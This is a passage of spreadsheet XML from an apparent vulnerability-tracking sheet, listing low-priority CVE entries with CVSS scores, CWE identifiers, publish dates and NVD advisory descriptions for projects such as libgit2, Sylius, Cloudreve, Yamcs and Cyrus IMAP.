      <c r="I5610" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J5610" s="5" t="inlineStr"/>
      <c r="K5610" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5610" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, libgit2 does not reject traversal components in a submodule path loaded from .gitmodules. The affected src/libgit2/submodule.c paths include git_submodule_lookup and git_submodule_add_setup. A crafted repository can specify a path such as ../escape-target, and applications that initialize the submodule can create directories outside the repository working tree. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="M5610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53584</t>
        </is>
      </c>
    </row>
    <row r="5611">
      <c r="A5611" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53638</t>
        </is>
      </c>
      <c r="C5611" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5611" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5611" s="5" t="inlineStr"/>
      <c r="F5611" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5611" s="5" t="inlineStr"/>
      <c r="H5611" s="5" t="inlineStr"/>
      <c r="I5611" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5611" s="5" t="inlineStr"/>
      <c r="K5611" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5611" s="5" t="inlineStr">
        <is>
          <t>Sylius is an Open Source eCommerce Framework on Symfony. Starting in version 2.0.0 and prior to version 2.0.18, 2.1.15, and 2.2.6, an authorization bypass vulnerability exists in the shop account API. The `PATCH /api/v2/shop/account/orders/{tokenValue}/payments/{paymentId}` endpoint, used by an authenticated shop customer to change the payment method of an order that has been placed but not yet paid (state `STATE_NEW`), does not validate that the chosen payment method is enabled for the order's channel. The equivalent checkout endpoint (`PATCH /api/v2/shop/orders/{tokenValue}/payments/{paymentId}`) correctly rejects out-of-channel payment methods with `HTTP 422`; the account endpoint silently accepts them and returns `HTTP 200`. An authenticated customer can therefore assign any globally enabled payment method to their own placed order, including methods that the store operator has explicitly excluded from that channel. The issue is fixed in versions: 2.0.18, 2.1.15, 2.2.6 and above. As a workaround, decorate the `Sylius\Bundle\ApiBundle\Changer\PaymentMethodChangerInterface` service in the application.</t>
        </is>
      </c>
      <c r="M5611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53638</t>
        </is>
      </c>
    </row>
    <row r="5612">
      <c r="A5612" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54492</t>
        </is>
      </c>
      <c r="C5612" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5612" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5612" s="5" t="inlineStr"/>
      <c r="F5612" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5612" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H5612" s="5" t="inlineStr"/>
      <c r="I5612" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5612" s="5" t="inlineStr"/>
      <c r="K5612" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5612" s="5" t="inlineStr">
        <is>
          <t>Koel is a free, open-source music streaming solution. Prior to 9.7.0, the Subsonic-compatible createPodcastChannel.view route accepts an authenticated user's private URL because app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php does not apply the SafeUrl validation used by the regular podcast API. app/Http/Controllers/Subsonic/CreatePodcastChannelController.php passes the URL to app/Services/Podcast/PodcastService.php, where PodcastService::addPodcast() and createParser() invoke Poddle::fromUrl() during channel creation, causing immediate server-side requests to loopback, Docker bridge, or RFC1918 HTTP destinations. The confirmed impact is blind internal request execution because generic response-body exfiltration was not demonstrated through this route. This issue is fixed in version 9.7.0.</t>
        </is>
      </c>
      <c r="M5612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54492</t>
        </is>
      </c>
    </row>
    <row r="5613">
      <c r="A5613" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54614</t>
        </is>
      </c>
      <c r="C5613" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5613" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5613" s="5" t="inlineStr"/>
      <c r="F5613" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5613" s="5" t="inlineStr"/>
      <c r="H5613" s="5" t="inlineStr"/>
      <c r="I5613" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J5613" s="5" t="inlineStr"/>
      <c r="K5613" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="L5613" s="5" t="inlineStr">
        <is>
          <t>DebugKit provides a debugging toolbar for CakePHP applications. Prior to 4.10.3 and 5.2.4, the DebugKit MailPreview feature in src/Controller/MailPreviewController.php accepts a route-controlled previewName value in findPreview and passes the resolved class from App::className() to constructor execution without rejecting namespace separators or verifying that the class extends DebugKit\Mailer\MailPreview. An attacker able to access DebugKit while debug mode is enabled and the request hostname is local or allowlisted can select an unintended application class through the mail-preview preview route, resulting in arbitrary constructor execution and limited disclosure of application information. This issue is fixed in versions 4.10.3 and 5.2.4.</t>
        </is>
      </c>
      <c r="M5613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54614</t>
        </is>
      </c>
    </row>
    <row r="5614">
      <c r="A5614" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55064</t>
        </is>
      </c>
      <c r="C5614" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5614" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5614" s="5" t="inlineStr"/>
      <c r="F5614" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5614" s="5" t="inlineStr"/>
      <c r="H5614" s="5" t="inlineStr"/>
      <c r="I5614" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5614" s="5" t="inlineStr"/>
      <c r="K5614" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5614" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. From 2.3.0 until 2.4.0, a user with Write but not Admin permission on a shared child project can detach it from its parent hierarchy by submitting parent_project_id equal to 0 to POST /api/v1/projects/{project}. The Project.CanUpdate authorization check in pkg/models/project_permissions.go and UpdateProject logic in pkg/models/project.go only gate nonzero parent values, while UpdateProject always persists parent_project_id, so the explicit zero value bypasses the Admin requirement introduced for CVE-2026-35595. Detachment severs the recursive permission-inheritance chain and can disrupt the owner’s hierarchy and inherited collaborator access. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="M5614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55064</t>
        </is>
      </c>
    </row>
    <row r="5615">
      <c r="A5615" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55227</t>
        </is>
      </c>
      <c r="C5615" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5615" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5615" s="5" t="inlineStr"/>
      <c r="F5615" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5615" s="5" t="inlineStr"/>
      <c r="H5615" s="5" t="inlineStr"/>
      <c r="I5615" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J5615" s="5" t="inlineStr"/>
      <c r="K5615" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L5615" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based localization tool. In versions prior to 2026.7, several endpoints look up objects in a globally scoped manner rather than restricting the lookup to projects the user can access, so they return HTTP 403 (Forbidden) instead of 404 (Not Found) when a user requests an object they are not authorized to see. This difference lets unauthorized users infer whether a given object exists in a private Weblate project. The issue has been fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="M5615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55227</t>
        </is>
      </c>
    </row>
    <row r="5616">
      <c r="A5616" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55468</t>
        </is>
      </c>
      <c r="C5616" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5616" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5616" s="5" t="inlineStr"/>
      <c r="F5616" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5616" s="5" t="inlineStr"/>
      <c r="H5616" s="5" t="inlineStr"/>
      <c r="I5616" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J5616" s="5" t="inlineStr"/>
      <c r="K5616" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="L5616" s="5" t="inlineStr">
        <is>
          <t>Wagtail is an open source content management system built on Django. Prior to versions 7.0.9, 7.3.4, 7.4.3, and 8.0rc2 on their respective release lines, the internal Pages admin API returns page fields declared in api_fields without sufficient access control, allowing a user with Wagtail admin access to retrieve restricted draft and live page content. This issue is fixed in versions 7.0.9, 7.3.4, 7.4.3, and 8.0rc2.</t>
        </is>
      </c>
      <c r="M5616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55468</t>
        </is>
      </c>
    </row>
    <row r="5617">
      <c r="A5617" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55495</t>
        </is>
      </c>
      <c r="C5617" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5617" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5617" s="5" t="inlineStr"/>
      <c r="F5617" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5617" s="5" t="inlineStr"/>
      <c r="H5617" s="5" t="inlineStr"/>
      <c r="I5617" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5617" s="5" t="inlineStr"/>
      <c r="K5617" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5617" s="5" t="inlineStr">
        <is>
          <t>Cloudreve is a self-hosted file management and sharing system. Prior to 4.17.0, the WOPI PUT_RELATIVE handler passes X-WOPI-SuggestedTarget to URI.JoinRaw as a path rather than a filename, allowing slash and dot-dot segments to escape the source file directory and create or conditionally overwrite files elsewhere in the same owner account. This issue is fixed in version 4.17.0.</t>
        </is>
      </c>
      <c r="M5617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55495</t>
        </is>
      </c>
    </row>
    <row r="5618">
      <c r="A5618" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55496</t>
        </is>
      </c>
      <c r="C5618" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5618" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5618" s="5" t="inlineStr"/>
      <c r="F5618" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5618" s="5" t="inlineStr"/>
      <c r="H5618" s="5" t="inlineStr"/>
      <c r="I5618" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5618" s="5" t="inlineStr"/>
      <c r="K5618" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-359</t>
        </is>
      </c>
      <c r="L5618" s="5" t="inlineStr">
        <is>
          <t>Cloudreve is a self-hosted file management and sharing system. Prior to 4.17.0, GET /api/v4/user/search calls SearchActive without adding a StatusActive predicate and serializes matches at RedactLevelUser, allowing any logged-in user to enumerate email addresses and profile metadata for inactive or banned accounts. The service calls userClient.SearchActive, but despite its name that method filters only by email/nickname keyword and never adds a StatusActive predicate — while the sibling lookups GetActiveByID and GetActiveByDavAccount, defined a few lines above it, do. Search hits are serialized at RedactLevelUser, which includes the email address. This issue is fixed in version 4.17.0.</t>
        </is>
      </c>
      <c r="M5618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55496</t>
        </is>
      </c>
    </row>
    <row r="5619">
      <c r="A5619" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55499</t>
        </is>
      </c>
      <c r="C5619" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5619" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5619" s="5" t="inlineStr"/>
      <c r="F5619" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5619" s="5" t="inlineStr"/>
      <c r="H5619" s="5" t="inlineStr"/>
      <c r="I5619" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5619" s="5" t="inlineStr"/>
      <c r="K5619" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5619" s="5" t="inlineStr">
        <is>
          <t>Cloudreve is a self-hosted file management and sharing system. Prior to 4.17.0, a single-file share event-stream subscription resolves the share root to the owner’s parent folder and subscribes to that folder topic, allowing an authenticated share recipient to receive names, paths, rename targets, event types, and hashed identifiers for unshared sibling files and folders. This issue is fixed in version 4.17.0.</t>
        </is>
      </c>
      <c r="M5619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55499</t>
        </is>
      </c>
    </row>
    <row r="5620">
      <c r="A5620" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55547</t>
        </is>
      </c>
      <c r="C5620" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5620" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5620" s="5" t="inlineStr"/>
      <c r="F5620" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5620" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5620" s="5" t="inlineStr"/>
      <c r="I5620" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5620" s="5" t="inlineStr"/>
      <c r="K5620" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="L5620" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs omits SystemPrivilege.ControlAccess checks from IamApi.listRoles, IamApi.getRole, and IamApi.listPrivileges in yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java. Any authenticated account can call GET /api/roles, GET /api/roles/{name}, and GET /api/privileges to enumerate available system privileges and configured role mappings. The disclosure reveals security configuration that can support targeted privilege-escalation attempts. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M5620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55547</t>
        </is>
      </c>
    </row>
    <row r="5621">
      <c r="A5621" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55566</t>
        </is>
      </c>
      <c r="C5621" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5621" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5621" s="5" t="inlineStr"/>
      <c r="F5621" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5621" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5621" s="5" t="inlineStr"/>
      <c r="I5621" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5621" s="5" t="inlineStr"/>
      <c r="K5621" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5621" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs processes attacker-controlled data from the /ext URL route in yamcs-web/src/main/webapp/projects/webapp/src/app/core/routes/extension.matcher.ts, extension.component.ts, and app.component.ts without checking registered plugin IDs before DOM rendering through innerHTML. A crafted URL can execute JavaScript when opened by a user. The script can read data available to the Yamcs web application and perform actions in the user context. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M5621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55566</t>
        </is>
      </c>
    </row>
    <row r="5622">
      <c r="A5622" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55696</t>
        </is>
      </c>
      <c r="C5622" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5622" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5622" s="5" t="inlineStr"/>
      <c r="F5622" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5622" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5622" s="5" t="inlineStr"/>
      <c r="I5622" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5622" s="5" t="inlineStr"/>
      <c r="K5622" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-80</t>
        </is>
      </c>
      <c r="L5622" s="5" t="inlineStr">
        <is>
          <t>PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Prior to 2.0.5, AttachmentViewer.setAttachment in js/privatebin.js uses getAttachmentMimeType to accept attacker-controlled MIME types and uses getBlobUrl to create a same-origin blob before setting attachmentLink's href for the Download attachment link. The SVG-only sanitization branch updates only the preview blob, so text/html, image/svg, application/xhtml+xml, and text/xml attachments can remain active in the download blob. On an instance with fileupload = true and a weakened, stripped, or absent Content Security Policy, an anonymous attacker can create such an attachment, and a victim who opens the link in a new tab causes inline JavaScript to execute in the PrivateBin origin. The script can read origin-scoped local storage and issue same-origin requests, including requests to applications co-hosted on the same domain. This issue is fixed in version 2.0.5.</t>
        </is>
      </c>
      <c r="M5622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55696</t>
        </is>
      </c>
    </row>
    <row r="5623">
      <c r="A5623" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55703</t>
        </is>
      </c>
      <c r="C5623" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5623" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5623" s="5" t="inlineStr"/>
      <c r="F5623" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5623" s="5" t="inlineStr"/>
      <c r="H5623" s="5" t="inlineStr"/>
      <c r="I5623" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5623" s="5" t="inlineStr"/>
      <c r="K5623" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5623" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.6.3, any activated account can request /maintenances/{id} and read maintenance records for assets in the same company without asset or maintenance permission. app/Http/Controllers/MaintenancesController.php show() renders the record without authorize(), while company-scoped route-model binding only prevents access to other companies. Disclosed fields include asset tags, suppliers, purchase costs, notes, and dates. This issue is fixed in version 8.6.3.</t>
        </is>
      </c>
      <c r="M5623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55703</t>
        </is>
      </c>
    </row>
    <row r="5624">
      <c r="A5624" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55834</t>
        </is>
      </c>
      <c r="C5624" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5624" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5624" s="5" t="inlineStr"/>
      <c r="F5624" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5624" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5624" s="5" t="inlineStr"/>
      <c r="I5624" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5624" s="5" t="inlineStr"/>
      <c r="K5624" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5624" s="5" t="inlineStr">
        <is>
          <t>Pocket ID is an OIDC provider that allows users to authenticate with their passkeys to services. From 2.6.0 until 2.9.0, frontend/src/routes/authorize/+page.ts reads the redirect_uri query parameter and frontend/src/routes/authorize/+page.svelte uses the raw callbackURL in redirectWithError when prompt=none cannot complete silent authorization. The client-side path only blocks javascript and data schemes and does not invoke the backend callback allow-list validation, so an unauthenticated attacker who knows a valid client_id can redirect a victim browser to an arbitrary HTTP or HTTPS origin for phishing or OIDC error and state smuggling. This issue is fixed in version 2.9.0.</t>
        </is>
      </c>
      <c r="M5624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55834</t>
        </is>
      </c>
    </row>
    <row r="5625">
      <c r="A5625" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59717</t>
        </is>
      </c>
      <c r="C5625" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5625" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5625" s="5" t="inlineStr"/>
      <c r="F5625" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5625" s="5" t="inlineStr"/>
      <c r="H5625" s="5" t="inlineStr"/>
      <c r="I5625" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5625" s="5" t="inlineStr"/>
      <c r="K5625" s="5" t="inlineStr">
        <is>
          <t>CWE-601, CWE-939</t>
        </is>
      </c>
      <c r="L5625" s="5" t="inlineStr">
        <is>
          <t>Home Assistant is open source home automation software focused on local control and privacy. Prior to 2026.6.1, the Android Companion app is vulnerable to an open redirect. The app passes the URL fragment from a homeassistant://invite deep link into the onboarding flow without ever displaying the destination hostname. Because no screen in the invitation or onboarding flow shows the parsed server URL before onboarding commits to it, a victim has no way to distinguish a legitimate invite from a malicious one. An attacker can craft an invite so that a single tap on the legitimate-looking "Connect to my Home Assistant server" button opens their /auth/authorize endpoint in the URL-less onboarding WebView, presenting a look-alike login page that captures the victim's credentials. Since invitations are intended to onboard brand-new users, targets are especially unlikely to notice the substitution. This issue is fixed in version 2026.6.1.</t>
        </is>
      </c>
      <c r="M5625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59717</t>
        </is>
      </c>
    </row>
    <row r="5626">
      <c r="A5626" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61663</t>
        </is>
      </c>
      <c r="C5626" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5626" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5626" s="5" t="inlineStr"/>
      <c r="F5626" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5626" s="5" t="inlineStr"/>
      <c r="H5626" s="5" t="inlineStr"/>
      <c r="I5626" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J5626" s="5" t="inlineStr"/>
      <c r="K5626" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L5626" s="5" t="inlineStr">
        <is>
          <t>django CMS is an easy-to-use and developer-friendly enterprise content management system powered by Django. Prior to 5.0.9, render_object_structure fails to authorize non-PageContent objects that use PlaceholderRelationField. An active staff user without cms.use_structure or model-level view or change permission can request the //admin/cms/placeholder/object/&lt;content_type_id&gt;/structure/&lt;object_id&gt;/ endpoint with guessed content_type_id and object_id values. The response discloses placeholder slot names, plugin trees, plugin identifiers, labels, and object existence for frontend-editable objects. The fix applies user_can_view_placeholder_source to the non-PageContent branch while keeping the structure board read-only for view-only users. This issue is fixed in versions 5.0.9.</t>
        </is>
      </c>
      <c r="M5626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61663</t>
        </is>
      </c>
    </row>
    <row r="5627">
      <c r="A5627" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61907</t>
        </is>
      </c>
      <c r="C5627" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5627" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5627" s="5" t="inlineStr"/>
      <c r="F5627" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5627" s="5" t="inlineStr"/>
      <c r="H5627" s="5" t="inlineStr"/>
      <c r="I5627" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5627" s="5" t="inlineStr"/>
      <c r="K5627" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5627" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. JMAP snooze bypasses the destination-mailbox ACL. An authenticated user with insert permissions on another user's snoozed mailbox could cause insertion of mail to that user's inbox, or any other of their mailboxes whose id was known to the user, despite having no insert permissions to the target mailbox.</t>
        </is>
      </c>
      <c r="M5627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61907</t>
        </is>
      </c>
    </row>
    <row r="5628">
      <c r="A5628" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61911</t>
        </is>
      </c>
      <c r="C5628" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5628" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5628" s="5" t="inlineStr"/>
      <c r="F5628" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5628" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H5628" s="5" t="inlineStr"/>
      <c r="I5628" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5628" s="5" t="inlineStr"/>
      <c r="K5628" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L5628" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. There is a Sieve mailbox existence oracle. An authenticated user could install a Sieve script that probed whether another user's private mailbox existed, or read the value of shared mailbox annotations, by observing which fileinto branch fired during LMTP delivery.</t>
        </is>
      </c>
      <c r="M5628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61911</t>
        </is>
      </c>
    </row>
    <row r="5629">
      <c r="A5629" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62249</t>
        </is>
      </c>
      <c r="C5629" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5629" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5629" s="5" t="inlineStr"/>
      <c r="F5629" s="5" t="n">
        <v>0.002</v>
      </c>
